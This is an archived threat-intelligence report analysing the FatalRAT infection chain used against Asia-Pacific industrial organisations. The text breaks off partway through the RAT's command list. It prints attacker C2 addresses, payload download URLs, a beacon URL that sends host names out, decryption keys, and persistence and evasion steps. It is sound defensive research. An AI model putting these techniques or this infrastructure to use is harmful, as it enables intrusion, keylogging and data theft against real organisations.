{ "id": "66a0d108-1197-4661-b8bc-352cec6ac60e", "created_at": "2026-04-06T01:30:46.207405Z", "updated_at": "2026-04-10T03:35:25.585649Z", "deleted_at": null, "sha1_hash": "e66c29589f2d77b18611624a8f1f7ac655ab133e", "title": "Operation SalmonSlalom | Kaspersky ICS CERT EN", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3310553, "plain_text": "Operation SalmonSlalom | Kaspersky ICS CERT EN\r\nBy Kaspersky ICS CERT Team\r\nPublished: 2025-02-23 · Archived: 2026-04-06 00:36:18 UTC\r\nA new attack targeting industrial organizations in APAC\r\nExecutive summary\r\nA Kaspersky ICS CERT investigation uncovered a cyberthreat specifically targeting various industrial organizations in\r\nthe Asia-Pacific region. The threat was orchestrated by attackers using legitimate Chinese cloud content delivery\r\nnetwork (CDN) myqcloud and the Youdao Cloud Notes service as part of their attack infrastructure. The attackers\r\nemployed a sophisticated multi-stage payload delivery framework to ensure evasion of detection. Their techniques\r\nincluded the use of a native file hosting CDN, publicly available packers for sample encryption, dynamic changes in\r\ncommand and control (C2) addresses, a CDN hosting the payload, and the use of DLL sideloading.\r\nWhile examining the code of the malicious artifacts, we noticed similarities to workflows observed in previous\r\ncampaigns orchestrated by threat actors using open-source remote access Trojans (RATs) such as Gh0st RAT,\r\nSimayRAT, Zegost, and FatalRAT. However, this campaign demonstrated a notable shift in tactics, techniques, and\r\nprocedures specifically tailored to Chinese-speaking targets.\r\nKaspersky ICS CERT called this attack campaign SalmonSlalom: the attackers challenged the cyberdefences like a\r\nsalmon navigates the cascading water while travelling upstream, losing their strength in maneuvering between sharp\r\nrocks.\r\nFor more information, please contact: ics-cert@kaspersky.com\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 1 of 37\n\nTechnical details\r\nBackground\r\nYoudao is a Chinese search engine and Youdao Cloud Notes, formerly known as Dao Notes, is an online database\r\ndesigned for individuals and teams, launched on June 28, 2011. Its versatile support spans multiple platforms,\r\nincluding client applications for personal computers (Windows and Mac), mobile (Android and IOS), and web. Thanks\r\nto its user-friendly interface and extensive multi-platform compatibility, it has garnered significant attention from\r\nChinese-speaking threat actors, who are increasingly utilizing it for malicious purposes.\r\nTo investigate this trend further, we conducted a search to identify all web pages associated with Youdao Cloud Notes\r\nthat have recently been reported for suspicious activity. Our findings indicate that a significant number of threat actors\r\nwere actively leveraging this service for their malicious activities.\r\nHowever, one intriguing case stood out because of an excessively long delivery framework, dynamic alterations of\r\nsubsequent payloads, extensive infrastructure, and the use of a legitimate binary’s function to spawn a child process.\r\nInitial infection\r\nKaspersky ICS CERT experts received information about a phishing campaign targeting government agencies and\r\nindustrial organizations in the Asia-Pacific region (Taiwan, Malaysia, China, Japan, Thailand, Hong Kong, South\r\nKorea, Singapore, the Philippines, Vietnam, etc.). In the course of our subsequent research, we found that as a result of\r\na complex multi-stage malware installation procedure, a backdoor class of malware, FatalRAT, is introduced into the\r\nsystem. Unlike another series of attacks described in an ESET report, the infection vector was not fake websites, but\r\nzip archives delivered via email, WeChat and Telegram.\r\nThe zip archives were disguised as invoices or legitimate tax filing applications for Chinese-speaking individuals and\r\ncontained the FatalRAT first-stage loader packed using AsProtect, UPX or NSPack to make detection and analysis\r\nmore difficult. Here are some examples of file names:\r\nOriginal file name Translated file name\r\n税前加计扣除新政指引.zip New policy guidelines for pre-tax super deductions.zip\r\n税务总局关于补贴有关税收的公\r\n告.zip\r\nAnnouncement of the State Administration of Taxation on Subsidy-related Taxes.zip\r\n年度企业所得税汇缴补税尽量安排\r\n在5月份入库.zip\r\nThe annual corporate income tax remittance and back tax should be\r\narranged to be deposited into the treasury in May as much as possible.zip\r\n关于企业单位调整增值税税率有关\r\n政策关于企业单位调整增值税税率\r\nRegarding the relevant policies for enterprise units to adjust the value-added tax rate. Regarding the relevant policies for enterprise units to\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 2 of 37\n\nOriginal file name Translated file name\r\n有关政策.zip adjust the value-added tax rate.zip\r\nIn this section we will look at the malware installation process, which, as we said, is complex and involves multiple\r\nsteps. The installation sequence is shown below:\r\nFig. 1 Infection chain\r\nFirst-stage loader\r\nWhile analyzing our telemetry data, we discovered that various first-stage loaders were being delivered as initial\r\naccess methods to deploy FatalRAT samples to Chinese-speaking targets.\r\nThe loaders we encountered are typically packed using UPX, AsPacker, or NSPack, and are unpacked at runtime. It\r\ncan be seen that the loader was compiled using Microsoft Visual C/C++ 2010. We were also able to clearly observe the\r\npresence of debug information in its string references, providing valuable insight into the threat actor’s environment:\r\nK:\\C++2010\\DLLrun\\DLLrunYoudao\\Release\\DLLrunYoudao.pdb\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 3 of 37\n\nUpon execution, the first-stage loader makes an HTTP request to Youdao Cloud Notes to download a dynamically\r\nupdated list of links to configurators (Before.dll) and second-stage loaders (Fangao.dll), for example:\r\nhttp://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae\r\nThe Youdao Cloud Notes returns a JSON response. The first few lines contain information about the note creation and\r\nmodification time, file name, size, followed by the next staged cloud storage location. The note structure was also\r\ndescribed in the K7 Security Labs report on the Sneaky SiMay RAT.\r\nFig. 2 Dynamically updated list of links to next-stage modules\r\nThe first-stage loader parses the custom note structure and picks the first links to the configurator (Before.dll) and the\r\nsecond-stage loader (Fangao.dll). If the first links don’t work, the next ones will be selected.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 4 of 37\n\nFig. 3 Part of the first-stage loader responsible for parsing the custom Youdao note structure\r\nOnce downloaded, Fangao.dll and Before.dll will be loaded and executed by the first-stage loader.\r\nConfigurator (Before.dll)\r\nThis DLL has an export named Before and a PDB path with Chinese characters:\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\BEFORE.pdb\r\nThe project name from the path could be translated as “Van Gogh Remote Management Client No. 2”.\r\nImportant note: this malware module, as well as the final payload, requires configuration information to\r\noperate. During our research, we discovered several variants of Before.dll: with hardcoded configuration\r\ninformation, with dynamically updated configuration information and samples that combine static and\r\ndynamic approaches. Let’s consider the last option as the most complete.\r\nThe malware downloads the contents of another note from note.youdao[.]com to obtain configuration information, for\r\nexample:\r\nhttp[:]//note.youdao[.]com/yws/api/note/1eaac14f58d9eff03cf8b0c76dcce913\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 5 of 37\n\nFig. 4 The note content with dynamically updated malware configuration information\r\nThis note contains a JSON with three types of URLs: submit, dll and online. If the note is unavailable for some\r\nreason, for example, the URL is invalid,Before.dll will use the configuration information specified in its code.\r\nThe value of each parameter is encrypted using xor with key 0x58 and written to the configuration file\r\nC:\\Users\\Public\\vanconfig.ini. Here is an example of the encrypted contents of the FatalRAT configuration file:\r\n[data]\r\nsubmit=0,,(bwwihivkkvjlkvkib`j\r\ndll=0,,(bwwiiuiki`njjhmav;7+v9(u696216?v5!);47-\u003cv;75w v\u003c44\r\nbelong=jn\r\nonline=ivijvkoviikb`h`i\r\nAnd the decrypted version of this file:\r\n[data]\r\nsubmit=http://101.33.243[.]31:82\r\ndll=http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/xxx.dll\r\nbelong=26\r\nonline=1.12.37[.]113:8081\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 6 of 37\n\nAs you can see in the Figure 4, the note has several sets of settings, most often several dozen at once. The malicious\r\nprogram checks the availability of the URL starting from the first block of settings and selects the first block that is\r\nfunctioning to save in the configuration file. The belong parameter refers to the block number in the note content that\r\nworked for this particular malware run attempt and can potentially allow the actors to track which of the URLs have\r\nalready been blocked by security solutions. Before.dll also generates a six-character random value that is used as a\r\nvictim ID. The generated value is saved in the C:\\Users\\Public\\history.txt file.\r\nAfter that, the configurator extracts a text document into a directory with Before.dll, the text document itself receives\r\nthe same name as the malware DLL file, but with the extension .txt. Once created, the following text is written to the\r\nfile:\r\nFig. 5 Lure document used by Before.dll\r\nThe document is a fake invoice that is opened by the malware to distract the user.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 7 of 37\n\nNote:\r\nThe contents of both custom Youdao Notes are updated on a regular basis. However, at the time of writing the\r\npage is no longer active.\r\nDuring our research we observed some of the servers mentioned above communicating with another malicious\r\nexecutable. We speculate that the same IP address may be used for different malicious campaigns.\r\nBefore.dll then collects the name and Windows version of the infected system and sends this information to the\r\nattacker’s server (as configured by the submit parameter provided in the note) in HTTP GET request parameters, for\r\nexample:\r\nhttp://101.33.243[.]31:82/initialsubmission?windows_version=17134\u0026computer_name=MYTEST:DESKTOP-CROB74D\r\nSecond-stage loader (Fangao.dll)\r\nThis DLL has one export named Fangao and a PDB path with Chinese characters:\r\nK:\\C++\\梵高远程管理客户端二号\\Release\\FANGAO.pdb\r\nThe project folder name is the same as that for Before.dll, and we believe that this second-stage loader was compiled\r\nwith the configurator module.\r\nThis module uses a configuration file C:\\Users\\Public\\vanconfig.ini prepared by Before.dll.\r\nFangao.dll reads the submit URL parameter from the configuration file and, like Before.dll, sends information about\r\nthe infected system to the server: network name and operating system version. The page name initialsubmission is\r\nappended to the server address.\r\nAfter that, the malware performs a number of preparatory actions: it checks internet connections by attempting to\r\nconnect to the Chinese search engine Baidu.com, sets the hidden and system attributes to its executable file, and also\r\ncreates a mutex with the name UniqueMutexName.\r\nNext, the configuration file prepared by the Before.dll module is used again, but now the dll parameter is used.\r\nFangao.dll downloads the FatalRAT payload (dll.dll, for example, bcec6b78adb3cf966fab9025dacb0f05), decrypts it\r\nusing a seven-byte xor key specific to each loader sample (for example, 0xE8, 0xF4, 0x13, 0x2F, 0xE2, 0xBF, 0x6B)\r\nand runs FatalRAT.\r\nInterestingly, to distract the user’s attention, this module displays a window with a message about an alleged error in\r\nthe program, apparently so that the user does not wonder why he did not see the window of the legitimate program he\r\nwas running.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 8 of 37\n\nFig. 6 The error message and the malware code that generates it\r\nThe message is displayed via a standard modal dialog window and contains a few typos that highlight the level of\r\ninaccuracy and carelessness demonstrated by the actors.\r\nThe malware conducts a series of checks to determine whether it is necessary to activate destructive activity on a given\r\nsystem, each check having its own identifier (name):\r\nCondition\r\nname (id)\r\nCondition description\r\nTwo:safe1\r\nThe files My Document.txt and My Document.xls are searched on the desktop; if any of the files\r\nis found, the check is considered as failed\r\nsafe2\r\nThe substring C:\\tmp is searched in the malware executable file path; if the substring is present, the\r\ncheck is considered as failed\r\nTwo:safe4 The file name is checked for special characters; if they are found, the check is considered as failed\r\nTwo:safe5\r\nIf the system localization language does not match any of the following:\r\nChinese (Hong Kong S.A.R.) 3076\r\nChinese (Macau S.A.R.) 5124\r\nChinese (People’s Republic of China) 2052\r\nChinese (Singapore) 4100\r\nChinese (Taiwan) 1028the check is considered as failed\r\nA check is made to see if the system’s time zone is set to UTC+8 (which includes many Asian\r\ncountries); if a different time zone is set, the check is considered as failed\r\nTwo:safe6 The malware obtains the registry key value\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\disk\\Enum\\0 and checks for\r\nthe presence of the vmware substring in the key value; if the substring is present, the check is\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 9 of 37\n\nCondition\r\nname (id)\r\nCondition description\r\nconsidered as failedThis way the malware prevents destructive activity from running on virtual\r\nmachines\r\nIf any of the checks fail, the malware makes an HTTP GET request to the page \u003csubmitURL\u003e/submiterror?\r\nid=\u0026error_id=\u003cconditionName\u003e, where \u003csubmitURL\u003e is the submit server address taken from the configuration\r\nfile and \u003cconditionName\u003e is the name of the condition that was failed. The malicious program then specifically\r\ngenerates an exception and crashes.\r\nIf the checks are passed, Fangao.dll begins the process of unpacking the resources it contains. The unpacker utility\r\n(unrar.dll) is saved from resource 103 in the directory with the executable file of the malicious program, and its file is\r\nassigned the hidden and system attributes. The malware also creates two new folders: C:\\ProgramData\\KnGoe and\r\nC:\\ProgramData\\8877.\r\nThe resource with the name 101 is extracted and saved to the file C:\\ProgramData\\KnGoe\\PO520.rar, the resource\r\nwith the name 102 is extracted and saved to the file C:\\ProgramData\\KnGoe\\QD.rar and the resource with the name\r\n104 is extracted and saved to the file C:\\ProgramData\\KnGoe\\MMC.rar.\r\nOnce the archives are saved, Fangao.dll begins to extract files from them using unrar.dll mentioned above and the\r\npassword by2022. Below we provide detailed information about the unpacked files:\r\nArchive Destination path File description\r\nPO520.rar C:\\ProgramData\\KnGoe\\e.dll\r\nDDUtility.dll, part of legitimate DriverAssistant\r\nutility\r\nPO520.rar C:\\ProgramData\\KnGoe\\r.dll\r\nDMMUtility.dll, part of legitimate DriverAssistant\r\nutility\r\nPO520.rar C:\\ProgramData\\KnGoe\\t.dll wke.dll – sideloaded malicious DLL\r\nPO520.rar C:\\ProgramData\\KnGoe\\t.ini “MZ” header stored inside text file\r\nPO520.rar C:\\ProgramData\\KnGoe\\w.dll\r\nacvb.exe – executable file used for DLL\r\nsideloading (into the DriverAssistant process)\r\nQD.rar C:\\ProgramData\\KnGoe\\0user.exe Legitimate software, part of PureCodec\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 10 of 37\n\nArchive Destination path File description\r\nQD.rar C:\\ProgramData\\KnGoe\\update.ini PureCodec configuration file\r\nQD.rar C:\\ProgramData\\KnGoe\\YX.vbs Malicious VBS script\r\nQD.rar C:\\ProgramData\\KnGoe\\user.bat Malicious CMD script\r\nMMC.rar\r\nC:\\ProgramData\\8877\\Local Group Policy\r\nEditor.msc\r\nGroup policy editor in Chinese language\r\nFig. 7 Fangao.dll resource unpacking scheme\r\nAfter unpacking, the archives are deleted and the malicious program searches for instances of the mmc.exe process\r\namong running programs and terminates them.\r\nThe malicious program checks for the existence of the registry key\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Logon, which is\r\nnot present in the operating system by default, but is created if group policies specify scripts to execute when a user\r\nlogs on to the system. If the registry key exists, the malware assumes that persistence has already been established and\r\nexits – the legitimate cases where this approach is used to launch scripts at user logon are ignored by the actors\r\n(probably considered to be rare).\r\nIf the registry key does not exist, the malware attempts to create a persistence mechanism by simulating GUI\r\noperations (described below) with the help of the policy editor UI they brought. This approach means the actors don’t\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 11 of 37\n\nhave to mess with the UAC bypass – they get the rights they need by executing the legitimate and signed\r\nDriverAssistant tool (described later).\r\nUsing Windows Explorer, Fangao.dll opens the C:\\ProgramData\\8877 directory where the Chinese version of the\r\nGroup Policy Editor toolkit was previously unpacked. The opened Windows Explorer window is immediately hidden\r\nby a separate thread, and the malware sends messages to the hidden Windows Explorer window to emulate left clicks\r\nof the mouse, thus the malicious program launches the Group Policy Editor, simulating user actions via the GUI.\r\nThe window of the running Group Policy Editor is also hidden (using the SetWindowPos and EnableWindow API\r\nfunctions), after which the malicious program begins “navigating” inside the window. First, it selects the navigation\r\npanel on the left (highlighted in blue in Figure 8).\r\nNext, the malware interacts with the window by searching for the necessary elements by window class name and\r\nsending messages to it with WM_KEYDOWN and WM_KEYUP codes to simulate keystrokes. Using this GUI\r\ninteraction approach, Fangao.dll manages to navigate to the User Configuration → Windows Settings → Scripts\r\n(Logon/Logoff) section (Figure 8 – step 1), and create a group policy in the Logon subsection (Figure 8 – steps 2, 3)\r\npointing to the PureCodec application exploited in the attack (C:\\ProgramData\\KnGoe\\0user.exe).\r\nFig. 8 Malicious GUI actions carried out in a hidden Group Policy Editor window\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 12 of 37\n\nFig. 9 Code for navigating via the GUI and sending keystrokes to the hidden window\r\nThis is how the second-stage loader ensures automatic launch of malware after user login by creating a new group\r\npolicy user logon script and specifying the path to the legitimate PureCodec application file as the program to execute\r\n(its use in the attack is described in the next section).\r\nTo make sure that the autorun procedure is successful, the malicious program checks once again whether the registry\r\nkey HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Scripts\\Logon is\r\npresent in the system, and if it is missing, the error “RegRunError” is sent to the standard output stream (stdout).\r\nThis completes the malware installation procedure and Fangao.dll launches C:\\ProgramData\\KnGoe\\0user.exe and\r\nthen terminates.\r\nMalware workflow\r\nIn this section we will look at the operating algorithm of the installed malware, which is also of particular interest. The\r\nthreat actor uses a black and white method where the actor leverages the functionality of legitimate binaries to make\r\nthe chain of events look like normal activity. The attackers also used a DLL sideloading technique to hide the\r\npersistence of the malware in legitimate process memory. The malware launch sequence is shown below:\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 13 of 37\n\nFig. 10 FatalRAT launch sequence\r\nExploitation of PureCodec (0user.exe)\r\n0user.exe is legitimate software. Its original name is PurePlayer.exe. The binary is part of the legitimate installer of\r\nPureCodec software that is distributed via various Chinese software distribution sites.\r\nThe legitimate 0user.exe binary would, under normal circumstances, load the update.ini configuration file and run the\r\nbinary specified as the path parameter in the update.ini file by performing the ShellExecuteExA Windows API call.\r\nPotPlayer.exe in a legitimate use case.\r\nIn this case, the threat actor manipulates the contents of update.ini to execute the next staged process: YX.vbs.\r\nFig. 11 Malicious version of update.ini\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 14 of 37\n\nFig. 12 Example of contents of legitimate update.ini\r\nMalicious scripts: YX.vbs and user.bat\r\nYX.vbs started by 0user.exe (PureCodec app) runs user.bat using wscript.shell.\r\nFig. 13 Contents of YX.vbs\r\nThen user.bat performs the following:\r\n1. Creates a new C:\\user0 directory\r\n2. Removes the C:\\test directory\r\n3. Checks if user0.exe is already running, and if so, kills it using taskill.exe\r\n4. Checks if the file C:\\ProgramData\\KnGoe\\w.dll exists; if it does, it adds the MZ header stored in\r\nC:\\ProgramData\\KnGoe\\t.ini to it as well as to three other files (C:\\ProgramData\\KnGoe\\e.dll,\r\nC:\\ProgramData\\KnGoe\\r.dll, C:\\ProgramData\\KnGoe\\t.dll) and saves them to the C:\\user0 folder under\r\nthe respective file names:\r\nSource path Destination path\r\nC:\\ProgramData\\KnGoe\\w.dll C:\\user0\\acvb.exe\r\nC:\\ProgramData\\KnGoe\\e.dll C:\\user0\\DDUtility.dll\r\nC:\\ProgramData\\KnGoe\\r.dll C:\\user0\\DMMUtility.dll\r\nC:\\ProgramData\\KnGoe\\t.dll C:\\user0\\wke.dll\r\n5. Sets the following attributes to C:\\user0 folder: read only, system, hidden and archived.\r\n6. Pings 127.0.0.1 (used to pause script execution).\r\n7. Runs C:\\user0\\acvb.exe (DriverAssistant tool).\r\n8. Pings 127.0.0.1 (used to pause script execution).\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 15 of 37\n\n9. Sets the following attributes to all files in the C:\\test folder: read only, system, hidden and archived.\r\n10. Retrieves the list of running processes using tasklist and finds the process running acvb.exe using findstr. If the\r\nprocess is not found, it returns to step 4.\r\n11. Sets the following attributes to C:\\ProgramData\\KnGoe\\YX.vbs: read only, system, hidden and archived.\r\n12. Sets the following attributes to files in the C:\\user0 folder: read only, system, hidden and archived.\r\nFig. 14 Contents of user.bat\r\nIt is worth noting that the script contains one commented out line:\r\n::@del “C:\\user0\\svchoet.exe” /AR /AH /AS /AA 2\u003enul\r\nIt is clear that the file C:\\user0\\svchoet.exe is attempting to masquerade as a system file and is most likely part of the\r\nattack being investigated, but during our research we were unable to find any other traces of this file being used.\r\nIt is also clear that the level of sophistication of the .bat file developer is low, as three of the four initial checks would\r\nnever run, and the script may run an obvious infinite loop in some of the possible deployment cases.\r\nExploitation of DriverAssistant (acvb.exe)\r\nThe acvb.exe binary is the DriverAssistant utility from a Chinese developer that helps install drivers on the machine.\r\nThe threat actor leverages acvb.exe, which is vulnerable to DLL sideloading. Launching DriverAssistant requires\r\nadministrator rights and, if not launched as a service, results in the UAC window being displayed. The three\r\nhighlighted libraries contain helper functions necessary for DriverAssistant, so these libraries are dropped to the disk.\r\nThreat actors opt to substitute any of the legitimate DLLs with a malicious DLL instead. During our research, we saw\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 16 of 37\n\ncases of DLL sideloading of other libraries from these three, highlighting the flexibility of the attacker in their choice\r\nof DLL replacement.\r\nFig. 15 Acvb.exe imported DLLs\r\nIn this case, DriverAssistant (acvb.exe) loads wke.dll, which was previously extracted from Fangao.dll resources with\r\nthe name t.dll, and calls its exported function wkeInit.\r\nThird-stage loader (wke.dll)\r\nThis DLL also contains debug information in its string references:\r\nK:\\C++\\DLL反射注入器四件套二号\\Release\\DLL运行器DLL版(wke.dll).pdb\r\nThis PDB path could be translated as “ K:\\C++\\DLLReflective injector four-piece set No.\r\n2\\Release\\DLLrunnerDLLVersion(wke.dll).pdb “.\r\nwke.dll is packed using ASPacker, with a large number of null bytes appended to the end of the file to increase its size\r\nand make it bloated. It is unpacked in memory at runtime.\r\nWhen the DriverAssistant app loads this DLL and calls the exported wkeInit function, the malware code makes an\r\nHTTP GET request to a hardcoded URL, for example:\r\nhttp://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nDLL.dll is a FatalRAT payload described in the next section. The loaded library is not saved on disk, but is decrypted\r\nusing an xor operation and executed in memory.\r\nFinal payload – FatalRAT\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 17 of 37\n\nOther research groups, in particular LevelBlue (formerly AT\u0026T Security) and Antiy, described FatalRAT in detail, but\r\nKaspersky Threat Attribution Engine (KTAE) showed only a 73–76% code match with the described versions of\r\nFatalRAT, prompting us to describe a new version of this malware.\r\nFatalRAT performs 17 checks for an indicator that the malware executes in a virtual machine or sandbox environment,\r\nincluding some specific ones such as ThreatBook Cloud Sandbox.\r\nIf any of the checks fail, the malware stops executing. The malware also terminates all instances of the rundll32.exe\r\nprocess, which is also likely a measure to prevent malware analysis, since FatalRAT is a DLL that must be launched by\r\nmalware loaders, not a system utility.\r\nFatalRAT also blocks the ability to lock the computer by setting the registry key\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation\r\nto 1.\r\nAlso, in a separate thread, FatalRAT starts intercepting keystrokes on the keyboard, i.e., launches a keylogger. The\r\nintercepted information is written to the file C:\\Windows\\Fatal.key. The malware decrypts hardcoded configuration\r\ndata using an algorithm identical to previous versions. However, in the case of the samples being analyzed, instead of\r\nthe malware’s command and control server, the hardcoded configuration data contains the IP address of Google\r\n(8.8.8.8):\r\nFig. 16 FatalRAT decrypted strings\r\nThe malware then reads the online value from the C:\\Users\\Public\\vanconfig.ini configuration file created by\r\nBefore.dll and decrypts it using xor with the 0x58 key:\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 18 of 37\n\nFig. 17 FatalRAT external config loading and decryption routine\r\nThe server address and port from the online value of vanconfig.ini are used by FatalRAT to connect to the command\r\nand control server.\r\nDepending on the configuration, the malicious program can automatically launch itself on the infected system using a\r\nregistry key and a service. If this option is enabled, FatalRAT downloads its binary from the command and control\r\nserver and saves the downloaded buffer to the path C:\\Windows\\nw_elf.dll and sets it as a value to the registry key\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SVP7. If a service is created, its\r\nname and description are taken from the configuration data specified in the malware code.\r\nNext, FatalRAT collects information about the infected system and sends the collected information to the malware’s\r\ncommand and control server:\r\nExternal IP address (obtained using the http://www.taobao.com/help/getip.php service)\r\nOperating system installation time\r\nOperating system architecture and version\r\nInformation about malware service/registry key\r\nInformation about CPU\r\nInformation about whether the user is currently idle (no input events received for more than 180,000 ticks)\r\nUser name\r\nWhether the Tencent QQ messenger is running on the system (search by window class\r\nCTXOPConntion_Class)\r\nInformation about security solutions and other software running on the system; FatalRAT searches for the\r\nfollowing processes:\r\nProcess name Application\r\n360tray.exe 360 Total Security\r\navp.exe Kaspersky security solutions\r\nKvMonXP.exe Jiangmin security solutions\r\nRavMonD.exe Rising Antivirus\r\n360sd.exe Qihu 360 Internet Security\r\nMiner.exe Probably some type of cryptocurrency miner\r\negui.exe ESET Smart Security\r\nkxetray.exe, ksafe.exe Kingsoft applications\r\nTMBMSRV.exe Trend Micro Internet Security\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 19 of 37\n\nProcess name Application\r\navgui.exe AVG Internet Security\r\nashDisp.exe Avast Antivirus software\r\nMPMON.EXE Micropoint security solutions\r\navcenter.exe, arcavir.exe, agent.exe Avira security solutions\r\nspidernt.exe Dr.Web security solutions\r\nMcshield.exe McAfee VirusScan\r\nf-secure.exe F‑Secure security solutions\r\nccSvcHst.exe, ccSetMgr.exe Symantec security solutions\r\nauthfw.exe Authentium Firewall\r\nvsserv.exe Bitdefender Total Security\r\ncfp.exe COMODO security solutions\r\nF-PROT.exe F-Prot Antivirus\r\nguardxservice.exe Ikarus security solutions\r\nmssecess.exe Microsoft Security Essentials\r\nV3Svc.exe, patray.exe AhnLab security solutions\r\nremupd.exe Panda antivirus software\r\nalmon.exe Sophos AutoUpdate Monitor\r\nAPASServ.exe Sunbelt AutoPilot\r\nFortiTray.exe Fortinet software\r\nNVCSched.exe Norman Virus Control Scheduler\r\nQQPCRTP.exe Tencent QQPCMgr\r\nBaiduSdSvc.exe Baidu Antivirus\r\nqq.EXE Tencent QQ\r\nyy.exe xfplay\r\n9158.EXE 9158chat\r\nCamfrog Video Chat.exe Camfrog Video Chat\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 20 of 37\n\nProcess name Application\r\nmstsc.EXE Windows remote desktop client\r\nAliIM.exe TradeManager\r\nDUBrute.exe DUBrute bruteforce tool\r\nNsvmon.npc Naver Anti-Virus\r\nknsdtray.exe Keniu Free Antivirus\r\nFTP.exe Windows FTP client\r\nServUDaemon.exe Serv-U FTP Server\r\nsafedog.exe Safedog security solution\r\nQUHLPSVC.EXE Quick Heal AntiVirus\r\ns.exe, 1433.exe Unknown\r\nWhen all the data has been collected, the malware transfers it to the command and control server. The method of\r\nencrypting and decrypting traffic to the management server has not changed from the previous version of FatalRAT.\r\nFig. 18 FatalRAT C2 request encryption routine\r\nNext, the malware waits for commands to arrive from the command and control server; the commands supported by\r\nthe detected version of FatalRAT are listed below:\r\nCommand\r\nid\r\nCommand description\r\n0x6B Runs keylogger and sends collected data to C2\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 21 of 37\n\nCommand\r\nid\r\nCommand description\r\n0x6C-0x71\r\nCommand codes reserved for plugins\r\n0x7C\r\nExecutes one specified subcommand:\r\n0x7D – corrupt Master Boot Record (MBR)\r\n0x7E – open the CD\\DVD drive\r\n0x7F – close the CD\\DVD drive\r\n0x80 – show Program Manager window\r\n0x81 – hide Program Manager window\r\n0x82 – play monophonic sounds through the built-in speakers\r\n0x83 – move running windows and play monophonic sounds through the built-in speakers 15\r\ntimes\r\n0x84 – turn off the screen\r\n0x85 – turn on the screen\r\n0x86 – hide TaskBar\r\n0x87 – show TaskBar\r\n0x88 – swap left and right mouse buttons\r\n0x89 – restore mouse buttons actions\r\n0x8A Sends data collected by keylogger to command and control server\r\n0x8C Changes screen resolution to 1600×900\r\n0x8E Runs the application with the rights of another user\r\n0x8F Finds and deletes user data in the Chrome browser (Chrome User Data)\r\n0x90 Kills 